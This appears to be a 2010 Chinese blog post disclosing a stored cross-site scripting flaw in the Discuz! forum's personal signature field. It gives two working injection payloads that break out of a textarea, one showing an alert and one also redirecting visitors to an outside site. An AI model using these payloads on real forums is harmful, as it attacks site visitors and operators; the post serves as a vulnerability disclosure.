Discuz!个性签名跨站漏洞

时间: 2010-08-04 / 分类: 黑白网络 / 浏览次数: 56 views / 0个评论 发表评论

国内很多论坛都用的Discuz!    大家对dz的研究更多了Discuz! 个人中心里的“个人签名”没有对恶意代码进行检测,在 Discuz! 及 img 代码禁用的情况下仍可写入恶意代码,Discuz! 会保存并执行该代码,形成永久型跨站。该漏洞可能导致蠕虫病毒的传播。

虽便选个 Discuz! 论坛我们注册一个用户!
并输入跨站脚本代码 , 以我们个人的签名!
代码:
</textarea><script>alert(/stuhack/);</script><textarea>
也可以写成这样:</textarea><script>alert(/注册成功/);location.href=/http://www.stuhack.com/;</script><textarea>

订阅

发表评论

你必须 登录后 才能留言!